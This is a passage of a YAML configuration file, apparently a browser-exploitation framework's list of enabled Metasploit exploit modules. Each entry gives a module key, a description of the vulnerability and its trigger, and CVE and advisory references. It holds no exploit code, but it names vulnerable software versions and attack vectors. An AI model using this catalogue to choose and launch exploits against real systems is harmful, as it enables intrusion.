\t\t\t\tin the pvcalendar.ocx control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-6016
- - OSVDB
- "42358"
- - BID
- "26904"
- - URL
- http://secunia.com/advisories/27885/
path: extensions/metasploit/
class: Msf_module
msf_ms10_002_aurora:
enable: true
msf: true
msf_key: windows/browser/ms10_002_aurora
name: Internet Explorer "Aurora" Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption flaw in Internet Explorer. This\n\
\t\t\t\tflaw was found in the wild and was a key component of the \"Operation Aurora\"\n\
\t\t\t\tattacks that led to the compromise of a number of high profile companies. The\n\
\t\t\t\texploit code is a direct port of the public sample published to the Wepawet\n\
\t\t\t\tmalware analysis site. The technique used by this module is currently identical\n\
\t\t\t\tto the public sample; as such, only Internet Explorer 6 can be reliably exploited.\n\
\t\t\t"
authors:
- - MSB
- MS10-002
- - CVE
- 2010-0249
- - OSVDB
- "61697"
- - URL
- http://www.microsoft.com/technet/security/advisory/979352.mspx
- - URL
- http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
path: extensions/metasploit/
class: Msf_module
msf_blackice_downloadimagefileurl:
enable: true
msf: true
msf_key: windows/browser/blackice_downloadimagefileurl
name: Black Ice Cover Page ActiveX Control Arbitrary File Download
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a user's file system\n\
\t\t\t\tby abusing the \"DownloadImageFileURL\" method in the Black Ice BIImgFrm.ocx ActiveX\n\
\t\t\t\tControl (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the\n\
\t\t\t\tpayload to the remote machine, and then uploading another MOF file, which causes the Windows\n\
\t\t\t\tManagement Instrumentation service to execute the binary. Please note that this module\n\
\t\t\t\tcurrently only works for Windows before Vista. Also, a similar issue is reported in\n\
\t\t\t\tBIDIB.ocx (10.9.3.0) within the Barcode SDK.\n\
\t\t\t"
authors:
- - CVE
- 2008-2683
- - OSVDB
- "46007"
- - BID
- "29577"
- - URL
- http://www.exploit-db.com/exploits/5750/
path: extensions/metasploit/
class: Msf_module
msf_hpmqc_progcolor:
enable: true
msf: true
msf_key: windows/browser/hpmqc_progcolor
name: HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack-based buffer overflow in SPIDERLib.Loader\n\
\t\t\t\tActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD)\n\
\t\t\t\tfor Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and\n\
\t\t\t\t8.2 SP1 before Patch 32.\n\
\t\t\t\tBy setting an overly long value to 'ProgColor', an attacker can overrun\n\
\t\t\t\ta buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1819
- - OSVDB
- "34317"
- - BID
- "23239"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497
path: extensions/metasploit/
class: Msf_module
msf_ie_createobject:
enable: true
msf: true
msf_key: windows/browser/ie_createobject
name: Internet Explorer COM CreateObject Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a generic code execution vulnerability in Internet\n\
\t\t\t\tExplorer by abusing vulnerable ActiveX objects.\n\
\t\t\t"
authors:
- - MSB
- MS06-014
- - CVE
- 2006-0003
- - OSVDB
- "24517"
- - MSB
- MS06-073
- - CVE
- 2006-4704
- - OSVDB
- "30155"
path: extensions/metasploit/
class: Msf_module
msf_mswhale_checkforupdates:
enable: true
msf: true
msf_key: windows/browser/mswhale_checkforupdates
name: Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n\
\t\t\t\tGateway Whale Client. When sending an overly long string to the CheckForUpdates()\n\
\t\t\t\tmethod of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2238
- - OSVDB
- "53933"
- - URL
- http://technet.microsoft.com/en-us/library/dd282918.aspx
path: extensions/metasploit/
class: Msf_module
msf_ms06_055_vml_method:
enable: true
msf: true
msf_key: windows/browser/ms06_055_vml_method
name: Internet Explorer VML Fill Method Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft Internet Explorer using\n\
\t\t\t\ta buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n\
\t\t\t\tWindows 2000 SP4, Windows XP SP0, and Windows XP SP2.\n\
\t\t\t"
authors:
- - CVE
- 2006-4868
- - OSVDB
- "28946"
- - MSB
- MS06-055
- - BID
- "20096"
path: extensions/metasploit/
class: Msf_module
msf_mozilla_interleaved_write:
enable: true
msf: true
msf_key: windows/browser/mozilla_interleaved_write
name: Mozilla Firefox Interleaving document.write and appendChild Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in Mozilla\n\
\t\t\t\tFirefox caused by interleaved calls to document.write and appendChild.\n\
\t\t\t\tThis exploit is a Metasploit port of the in-the-wild exploit.\n\
\t\t\t"
authors:
- - CVE
- 2010-3765
- - OSVDB
- "68905"
- - BID
- "15352"
- - URL
- http://www.exploit-db.com/exploits/15352/
- - URL
- https://bugzilla.mozilla.org/show_bug.cgi?id=607222
- - URL
- http://www.mozilla.org/security/announce/2010/mfsa2010-73.html
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_callbackurl:
enable: true
msf: true
msf_key: windows/browser/novelliprint_callbackurl
name: Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n\
\t\t\t\tWhen sending an overly long string to the 'call-back-url' parameter in an\n\
\t\t\t\top-client-interface-version action of ienipp.ocx an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-1527
- - OSVDB
- "67411"
- - URL
- http://secunia.com/secunia_research/2010-104/
- - URL
- http://www.exploit-db.com/exploits/15042/
path: extensions/metasploit/
class: Msf_module
msf_vlc_amv:
enable: true
msf: true
msf_key: windows/browser/vlc_amv
name: VLC AMV Dangling Pointer Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits VLC media player when handling a .AMV file. By flipping the 0x41st\n\
\t\t\t\tbyte in the file format (video width/height), VLC crashes due to an invalid pointer, which\n\
\t\t\t\tallows remote attackers to gain arbitrary code execution.\n\
\t\t\t\t\n\
\t\t\t\tThe vulnerable packages include:\n\
\t\t\t\tVLC 1.1.4\n\
\t\t\t\tVLC 1.1.5\n\
\t\t\t\tVLC 1.1.6\n\
\t\t\t\tVLC 1.1.7\n\
\t\t\t\t"
authors:
- - CVE
- 2010-3275
- - OSVDB
- "71277"
- - URL
- http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files
- - URL
- http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11
path: extensions/metasploit/
class: Msf_module
msf_persits_xupload_traversal:
enable: true
msf: true
msf_key: windows/browser/persits_xupload_traversal
name: Persits XUpload ActiveX MakeHttpRequest Directory Traversal
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a directory traversal in Persits Software Inc's\n\
\t\t\t\tXUpload ActiveX control (version 3.0.0.3) that's included in HP LoadRunner 9.5.\n\
\t\t\t\tBy passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n\
\t\t\t\tan attacker is able to write arbitrary files to arbitrary locations on disk.\n\n\
\t\t\t\tCode execution occurs by writing to the All Users Startup Programs directory.\n\
\t\t\t\tYou may want to combine this module with the use of multi/handler since a\n\
\t\t\t\tuser would have to log in for the payload to execute.\n\
\t\t\t"
authors:
- - CVE
- 2009-3693
- - OSVDB
- "60001"
- - URL
- http://retrogod.altervista.org/9sg_hp_loadrunner.html
path: extensions/metasploit/
class: Msf_module
msf_ms10_090_ie_css_clip:
enable: true
msf: true
msf_key: windows/browser/ms10_090_ie_css_clip
name: Internet Explorer CSS SetUserClip Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption vulnerability within Microsoft's\n\
\t\t\t\tHTML engine (mshtml). When parsing an HTML page containing a specially\n\
\t\t\t\tcrafted CSS tag, memory corruption occurs that can lead to arbitrary code\n\
\t\t\t\texecution.\n\n\
\t\t\t\tIt seems like Microsoft code inadvertently increments a vtable pointer to\n\
\t\t\t\tpoint to an unaligned address within the vtable's function pointers. This\n\
\t\t\t\tleads to the program counter being set to the address determined by the\n\
\t\t\t\taddress \"[vtable+0x30+1]\". The particular address depends on the exact\n\
\t\t\t\tversion of the mshtml library in use.\n\n\
\t\t\t\tSince the address depends on the version of mshtml, some versions may not\n\
\t\t\t\tbe exploitable. Specifically, those ending up with a program counter value\n\
\t\t\t\twithin another module, in kernel space, or just not able to be reached with\n\
\t\t\t\tvarious memory spraying techniques.\n\n\
\t\t\t\tAlso, since the address is not controllable, it is unlikely to be possible\n\
\t\t\t\tto use ROP to bypass non-executable memory protections.\n\
\t\t\t"
authors:
- - CVE
- 2010-3962
- - OSVDB
- "68987"
- - BID
- "44536"
- - URL
- http://www.microsoft.com/technet/security/advisory/2458511.mspx
- - URL
- http://www.exploit-db.com/exploits/15421/
- - MSB
- MS10-090
path: extensions/metasploit/
class: Msf_module
msf_ebook_flipviewer_fviewerloading:
enable: true
msf: true
msf_key: windows/browser/ebook_flipviewer_fviewerloading
name: FlipViewer FViewerLoading ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error in the\n\
\t\t\t\tFViewerLoading (FlipViewerX.dll) ActiveX control when handling the\n\
\t\t\t\t\"LoadOpf()\" method.\n\
\t\t\t"
authors:
- - CVE
- 2007-2919
- - OSVDB
- "37042"
- - BID
- "24328"
path: extensions/metasploit/
class: Msf_module
msf_ms09_002_memory_corruption:
enable: true
msf: true
msf_key: windows/browser/ms09_002_memory_corruption
name: Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits an error related to the CFunctionPointer function when attempting\n\
\t\t\t\tto access uninitialized memory. A remote attacker could exploit this vulnerability to\n\
\t\t\t\tcorrupt memory and execute arbitrary code on the system with the privileges of the victim.\n\
\t\t\t"
authors:
- - CVE
- 2009-0075
- - OSVDB
- "51839"
- - MSB
- MS09-002
path: extensions/metasploit/
class: Msf_module
msf_adobe_geticon:
enable: true
msf: true
msf_key: windows/fileformat/adobe_geticon
name: Adobe Collab.getIcon() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n\
\t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n\
\t\t\t\tcrafted pdf that contains a malformed Collab.getIcon() call, an attacker may\n\
\t\t\t\tbe able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0927
- - OSVDB
- "53647"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-014/
path: extensions/metasploit/
class: Msf_module
msf_systemrequirementslab_unsafe:
enable: true
msf: true
msf_key: windows/browser/systemrequirementslab_unsafe
name: Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows attackers to execute code via an unsafe method in\n\
\t\t\t\tHusdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0).\n\
\t\t\t"
authors:
- - CVE
- 2008-4385
- - OSVDB
- "50122"
- - US-CERT-VU
- "166651"
path: extensions/metasploit/
class: Msf_module
msf_msvidctl_mpeg2:
enable: true
msf: true
msf_key: windows/browser/msvidctl_mpeg2
name: Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption within the MSVidCtl component of Microsoft\n\
\t\t\t\tDirectShow (BDATuner.MPEG2TuneRequest).\n\
\t\t\t\tBy loading a specially crafted GIF file, an attacker can overrun a buffer and\n\
\t\t\t\texecute arbitrary code.\n\n\
\t\t\t\tClassID is now configurable via an advanced option (otherwise randomized) - I)ruid\n\
\t\t\t"
authors:
- - CVE
- 2008-0015
- - OSVDB
- "55651"
- - BID
- "35558"
- - MSB
- MS09-032
- - MSB
- MS09-037
- - URL
- http://www.microsoft.com/technet/security/advisory/972890.mspx
path: extensions/metasploit/
class: Msf_module
msf_symantec_altirisdeployment_runcmd:
enable: true
msf: true
msf_key: windows/browser/symantec_altirisdeployment_runcmd
name: Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n\
\t\t\t\tWhen sending an overly long string to RunCmd() method of\n\
\t\t\t\tAeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2009-3033
- - BID
- "37092"
- - OSVDB
- "60496"
path: extensions/metasploit/
class: Msf_module
msf_adobe_shockwave_rcsl_corruption:
enable: true
msf: true
msf_key: windows/browser/adobe_shockwave_rcsl_corruption
name: Adobe Shockwave rcsL Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a weakness in the Adobe Shockwave player's handling of\n\
\t\t\t\tDirector movies (.DIR). A memory corruption vulnerability occurs through an undocumented\n\
\t\t\t\trcsL chunk. This vulnerability was discovered by http://www.abysssec.com.\n\
\t\t\t"
authors:
- - CVE
- 2010-3653
- - OSVDB
- "68803"
- - URL
- http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip
path: extensions/metasploit/
class: Msf_module
msf_logitechvideocall_start:
enable: true
msf: true
msf_key: windows/browser/logitechvideocall_start
name: Logitech VideoCall ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n\
\t\t\t\tControl (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the\n\
\t\t\t\t\"Start()\" method, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2918
- - OSVDB
- "36820"
- - BID
- "24254"
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_getdriversettings:
enable: true
msf: true
msf_key: windows/browser/novelliprint_getdriversettings
name: Novell iPrint Client ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n\
\t\t\t\tsending an overly long string to the GetDriverSettings() property of ienipp.ocx\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-2908
- - OSVDB
- "46194"
- - URL
- http://secunia.com/advisories/30709/
path: extensions/metasploit/
class: Msf_module
msf_mysql_payload:
enable: true
msf: true
msf_key: windows/mysql/mysql_payload
name: Oracle MySQL for Microsoft Windows Payload Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module creates and enables a custom UDF (user defined function) on the\n\
\t\t\t\ttarget host via the SELECT ... into DUMPFILE method of binary injection. On\n\
\t\t\t\tdefault Microsoft Windows installations of MySQL (=< 5.5.9), directory write\n\
\t\t\t\tpermissions are not enforced, and the MySQL service runs as LocalSystem.\n\n\
\t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\
\t\t\t\tattack is finished, as well as the UDF DLL, and will define or redefine sys_eval()\n\
\t\t\t\tand sys_exec() functions.\n\
\t\t\t"
authors:
- - URL
- http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
- - URL
- http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html
path: extensions/metasploit/
class: Msf_module
msf_calicserv_getconfig:
enable: true
msf: true
msf_key: windows/license/calicserv_getconfig
name: Computer Associates License Server GETCONFIG Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA License Server\n\
\t\t\t\tnetwork service. By sending an excessively long GETCONFIG\n\
\t\t\t\tpacket the stack may be overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2005-0581
- - OSVDB
- "14389"
- - BID
- "12705"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213
path: extensions/metasploit/
class: Msf_module
msf_sentinel_lm7_udp:
enable: true
msf: true
msf_key: windows/license/sentinel_lm7_udp
name: SentinelLM UDP Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a simple stack buffer overflow in the Sentinel\n\
\t\t\t\tLicense Manager. The SentinelLM service is installed with a\n\
\t\t\t\twide selection of products and seems particularly popular with\n\
\t\t\t\tacademic products. If the wrong target value is selected,\n\
\t\t\t\tthe service will crash and not restart.\n\
\t\t\t"
authors:
- - CVE
- 2005-0353
- - OSVDB
- "14605"
- - BID
- "12742"
path: extensions/metasploit/
class: Msf_module
msf_calicclnt_getconfig:
enable: true
msf: true
msf_key: windows/license/calicclnt_getconfig
name: Computer Associates License Client GETCONFIG Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the CA License Client\n\
\t\t\t\tservice. This exploit will only work if your IP address can be\n\
\t\t\t\tresolved from the target system point of view. This can be\n\
\t\t\t\taccomplished on a local network by running the 'nmbd' service\n\
\t\t\t\tthat comes with Samba. If you are running this exploit from\n\
\t\t\t\tWindows and do not filter udp port 137, this should not be a\n\
\t\t\t\tproblem (if the target is on the same network segment). Due to\n\
\t\t\t\tthe bugginess of the software, you are only allowed one connection\n\
\t\t\t\tto the agent port before it starts ignoring you. If it wasn't for this\n\
\t\t\t\tissue, it would be possible to repeatedly exploit this bug.\n\
\t\t\t"
authors:
- - CVE
- 2005-0581
- - OSVDB
- "14389"
- - BID
- "12705"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213
path: extensions/metasploit/
class: Msf_module
msf_globalscapeftp_input:
enable: true
msf: true
msf_key: windows/ftp/globalscapeftp_input
name: GlobalSCAPE Secure FTP Server Input Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.\n\
\t\t\t\tAll versions prior to 3.0.3 are affected by this flaw. A valid user account (\n\
\t\t\t\tor anonymous access) is required for this exploit to work.\n\
\t\t\t"
authors:
- - CVE
- 2005-1415
- - OSVDB
- "16049"
- - BID
- "13454"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html
path: extensions/metasploit/
class: Msf_module
msf_32bitftp_list_reply:
enable: true
msf: true
msf_key: windows/ftp/32bitftp_list_reply
name: "32bit FTP Client Stack Buffer Overflow"
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n\
\t\t\t\t\tdownload a file that has an overly long filename.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_wftpd_size:
enable: true
msf: true
msf_key: windows/ftp/wftpd_size
name: Texas Imperial Software WFTPD 3.23 SIZE Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the SIZE verb in\n\
\t\t\t\tTexas Imperial's Software WFTPD 3.23.\n\
\t\t\t"
authors:
- - CVE
- 2006-4318
- - OSVDB
- "28134"
- - BID
- "19617"
path: extensions/metasploit/
class: Msf_module
msf_odin_list_reply:
enable: true
msf: true
msf_key: windows/ftp/odin_list_reply
name: Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n\
\t\t\t\ttriggered when processing the response on a LIST command. During the overflow,\n\
\t\t\t\ta structured exception handler record gets overwritten.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_dreamftp_format:
enable: true
msf: true
msf_key: windows/ftp/dreamftp_format
name: BolinTech Dream FTP Server 1.02 Format String
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string overflow in the BolinTech\n\
\t\t\t\tDream FTP Server version 1.02. Based on the exploit by SkyLined.\n\
\t\t\t"
authors:
- - CVE
- 2004-2074
- - OSVDB
- "4986"
- - BID
- "9800"
- - URL
- http://www.milw0rm.com/exploits/823
path: extensions/metasploit/
class: Msf_module
msf_proftp_banner:
enable: true
msf: true
msf_key: windows/ftp/proftp_banner
name: ProFTP 2.9 Banner Remote Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the ProFTP 2.9\n\
\t\t\t\tclient that is triggered through an excessively long welcome message.\n\
\t\t\t"
authors:
- - CVE
- 2009-3976
- - OSVDB
- "57394"
- - URL
- http://www.labtam-inc.com/index.php?act=products&pid=1
path: extensions/metasploit/
class: Msf_module
msf_filewrangler_list_reply:
enable: true
msf: true
msf_key: windows/ftp/filewrangler_list_reply
name: FileWrangler 5.30 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the FileWrangler client\n\
\t\t\t\tthat is triggered when the client connects to an FTP server and lists\n\
\t\t\t\tthe directory contents, containing an overly long directory name.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_httpdx_tolog_format:
enable: true
msf: true
msf_key: windows/http/httpdx_tolog_format
name: HTTPDX tolog() Function Format String Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in HTTPDX HTTP server.\n\
\t\t\t\tBy sending a specially crafted HTTP request containing format specifiers, an\n\
\t\t\t\tattacker can corrupt memory and execute arbitrary code.\n\n\
\t\t\t\tBy default logging is off for HTTP, but enabled for the 'moderator' user\n\
\t\t\t\tvia FTP.\n\
\t\t\t"
authors:
- - CVE
- 2009-4769
- - OSVDB
- "60182"
path: extensions/metasploit/
class: Msf_module
msf_oracle9i_xdb_ftp_pass:
enable: true
msf: true
msf_key: windows/ftp/oracle9i_xdb_ftp_pass
name: Oracle 9i XDB FTP PASS Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tBy passing an overly long string to the PASS command, a\n\
\t\t\t\tstack based buffer overflow occurs. David Litchfield has\n\
\t\t\t\tillustrated multiple vulnerabilities in the Oracle 9i XML\n\
\t\t\t\tDatabase (XDB), during a seminar on \"Variations in exploit\n\
\t\t\t\tmethods between Linux and Windows\" presented at the Blackhat\n\
\t\t\t\tconference.\n\
\t\t\t"
authors:
- - CVE
- 2003-0727
- - OSVDB
- "2449"
- - BID
- "8375"
- - URL
- http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf
path: extensions/metasploit/
class: Msf_module
msf_slimftpd_list_concat:
enable: true
msf: true
msf_key: windows/ftp/slimftpd_list_concat
name: SlimFTPd LIST Concatenation Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the SlimFTPd\n\
\t\t\t\tserver. The flaw is triggered when a LIST command is\n\
\t\t\t\treceived with an overly-long argument. This vulnerability\n\
\t\t\t\taffects all versions of SlimFTPd prior to 3.16 and was\n\
\t\t\t\tdiscovered by Raphael Rigo.\n\
\t\t\t"
authors:
- - CVE
- 2005-2373
- - OSVDB
- "18172"
- - BID
- "14339"
path: extensions/metasploit/
class: Msf_module
msf_easyfilesharing_pass:
enable: true
msf: true
msf_key: windows/ftp/easyfilesharing_pass
name: Easy File Sharing FTP Server 2.0 PASS Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the Easy File Sharing 2.0\n\
\t\t\t\tservice. By sending an overly long password, an attacker can execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-3952
- - OSVDB
- "27646"
- - BID
- "19243"
path: extensions/metasploit/
class: Msf_module
msf_xftp_client_pwd:
enable: true
msf: true
msf_key: windows/ftp/xftp_client_pwd
name: Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n\
\t\t\t\tthrough an excessively long PWD message.\n\
\t\t\t"
authors:
- - OSVDB
- "63968"
- - URL
- http://www.exploit-db.com/exploits/12332
path: extensions/metasploit/
class: Msf_module
msf_xlink_client:
enable: true
msf: true
msf_key: windows/ftp/xlink_client
name: Xlink FTP Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xlink FTP Client 32\n\
\t\t\t\tVersion 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n\
\t\t\t\tWhen an overly long FTP server response is received by a client,\n\
\t\t\t\tarbitrary code may be executed.\n\
\t\t\t"
authors:
- - CVE
- 2006-5792
- - OSVDB
- "33969"
- - URL
- http://www.metasploit.com/
- - URL
- http://www.xlink.com
path: extensions/metasploit/
class: Msf_module
msf_3cdaemon_ftp_user:
enable: true
msf: true
msf_key: windows/ftp/3cdaemon_ftp_user
name: 3Com 3CDaemon 2.0 FTP Username Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the 3Com 3CDaemon\n\
\t\t\t\tFTP service. This package is being distributed from the 3Com\n\
\t\t\t\tweb site and is recommended in numerous support documents.\n\
\t\t\t\tThis module uses the USER command to trigger the overflow.\n\
\t\t\t"
authors:
- - CVE
- 2005-0277
- - OSVDB
- "12810"
- - OSVDB
- "12811"
- - BID
- "12155"
- - URL
- ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip
path: extensions/metasploit/
class: Msf_module
msf_easyftp_list_fixret:
enable: true
msf: true
msf_key: windows/ftp/easyftp_list_fixret
name: EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n\
\t\t\t\tCredit goes to Karn Ganeshan.\n\n\
\t\t\t\tNOTE: Although, this is likely to exploit the same vulnerability as the\n\
\t\t\t\t'easyftp_cwd_fixret' exploit, it uses a slightly different vector.\n\
\t\t\t"
authors:
- - OSVDB
- "62134"
- - URL
- http://www.exploit-db.com/exploits/14400/
- - URL
- http://www.exploit-db.com/exploits/14451/
path: extensions/metasploit/
class: Msf_module
msf_filecopa_list_overflow:
enable: true
msf: true
msf_key: windows/ftp/filecopa_list_overflow
name: FileCopa FTP Server pre 18 Jul Version
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the buffer overflow found in the LIST command\n\
\t\t\t\tin fileCOPA FTP server pre 18 Jul 2006 version, discovered by www.appsec.ch.\n\
\t\t\t"
authors:
- - CVE
- 2006-3726
- - OSVDB
- "27389"
- - BID
- "19065"
path: extensions/metasploit/
class: Msf_module
msf_ftpsynch_list_reply:
enable: true
msf: true
msf_key: windows/ftp/ftpsynch_list_reply
name: FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in FTP Synchronizer Pro\n\
\t\t\t\tversion 4.0.73.274. The overflow gets triggered by sending an overly long filename to\n\
\t\t\t\tthe client in response to a LIST command.\n\
\t\t\t\tThe LIST command gets issued when doing a preview or when you have just created a new\n\
\t\t\t\tsync profile and allow the tool to see the differences.\n\
\t\t\t\tThis will overwrite a structured exception handler and trigger an access violation.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_ftpshell51_pwd_reply:
enable: true
msf: true
msf_key: windows/ftp/ftpshell51_pwd_reply
name: FTPShell 5.1 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n\
\t\t\t\ttriggered when the ftp client tries to process an overly long response to a PWD command.\n\
\t\t\t\tThis will overwrite the saved EIP and structured exception handler.\n\
\t\t\t"
authors:
- - OSVDB
- "68639"
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_easyftp_mkd_fixret:
enable: true
msf: true
msf_key: windows/ftp/easyftp_mkd_fixret
name: EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\
\t\t\t\tand earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n\
\t\t\t\tleads to a stack based buffer overflow.\n\n\
\t\t\t\tNOTE: EasyFTP allows anonymous access by default. However, in order to access the\n\
\t\t\t\t'MKD' command, you must have access to an account that can create directories.\n\n\
\t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\
\t\t\t\tThis exploit utilizes a small piece of code that I've referred to as 'fixRet'.\n\
\t\t\t\tThis code allows us to inject a payload of ~500 bytes into a 264 byte buffer by\n\
\t\t\t\t'fixing' the return address post-exploitation. See references for more information.\n\
\t\t\t"
authors:
- - OSVDB
- "62134"
- - URL
- http://www.exploit-db.com/exploits/12044/
- - URL
